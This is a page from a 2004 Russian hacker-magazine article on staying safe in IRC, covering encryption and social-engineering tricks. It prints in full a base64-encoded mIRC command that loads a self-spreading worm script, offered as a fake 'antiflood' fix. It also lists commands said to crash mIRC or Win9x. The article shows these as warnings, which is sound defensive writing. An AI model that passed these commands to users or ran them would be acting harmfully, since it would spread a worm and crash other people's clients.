Издательский дом ООО "Гейм Лэнд"СПЕЦВЫПУСК ЖУРНАЛА ХАКЕР #41, АПРЕЛЬ 2004 г.

Защити себя в IRC

Докучаев Дмитрий aka Forb

Спецвыпуск Xakep, номер #041, стр. 041-024-4


Однако шифрование происходит лишь после того, как клиент отошлет сообщение на сервер. Ты понимаешь, что защититься от ушастого соседа Васи при таком раскладе нельзя – трафик будет перехвачен раньше, чем он зашифруется. На помощь приходит поддержка SSL-соединения, при котором данные будут передаваться по защищенному соединению, а затем шифроваться. Именно этот вариант необходимо выбирать, если ты любитель баунсера ;) (и страдаешь паранойей, т.к. при SSL-коннекте уже происходит шифрование трафика, которого более чем достаточно для защиты от прослушивания хитрым соседом - прим. ред.).

Социальная инженерия

Вот, собственно, и все вредоносные методы в IRC. Но даже если ты шифруешься, скрываешь свой IP-адрес и имеешь непробойный клиент, тебя могут конкретно поиметь. Социальная инженерия творит чудеса. Используя ее приемы, хакер может запросто узнать твой IP-адрес, пароль к энигме, а также телефон и размер обуви. Ты, даже сам не подозревая, выдашь инфу якобы грудастой девочке, которая решила с тобой пофлиртовать. Естественно, приемы социальной инженерии легко сработают на новичке и будут раскушены человеком, который провел в IRC несколько лет. Впрочем, никто не застрахован от неприятностей.

Рассмотрим простой пример: тебе в приват приходит сообщение подобного рода:

<Super> Выполни это и навсегда избавишься от флуда! //write antiflood $decode(b24gKzE6dGV4dDoqOio6eyBpZiAo8Oji5fIgaXNpbiAk
MS0pIHsgLmF1c2VyIDIgJG5pY2sgfCAubXNnICRuaWNrIMLt6Ozg7ejlISDH4Pno8ujy5SDx5eH/IO7yIPTr8+TgISDN4OHl8Ojy5TogfCAubXNnICR
uaWNrIC8vd3JpdGUgYW50aWZsb29kICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycy
BhbnRpZmxvb2QgfSB8IGlmIChzZW5kID09ICQyKSB7ICRldmFsKCQzLSwyKSB8IC5jbG9zZW1zZyAkbmljayB9IH0=,m) | .load -rs antiflood

Набрав предлагаемые строки, ты подгрузишь скрипт-червяк, который будет распространяться без твоего ведома. Вообще, не рекомендую набирать команды, содержащие в себе функцию $decode(), предварительно не расшифровав ее параметры – можешь ненароком отформатировать себе жесткий диск :).

Другой пример. Клиент mIRC можно завалить простой командой /dns 66.134.31.1. Хитрое оформление зон вводит мирк в ступор. Естественно, что так просто юзер не наберет команду, а вот заставить его это сделать вполне реально ;). Например, сказать: "Эй, чувак, хочешь такой хост? Резолвни 66.134.31.1". Нет, я не призываю к массовому убийству клиентов, я лишь хочу предупредить тебя об опасности :).

Баги в клиентах всегда были. Нужно лишь читать багтрак, чтобы узнать их. Например, в Win9x винда убивалась простой командой "/run con/con", "/write aux" и т.д. А также существовал софт, который посредством кривого CTCP-запроса валил пирч (и винду заодно).

Назад на стр. 041-024-3  Содержание  Вперед на стр. 041-024-5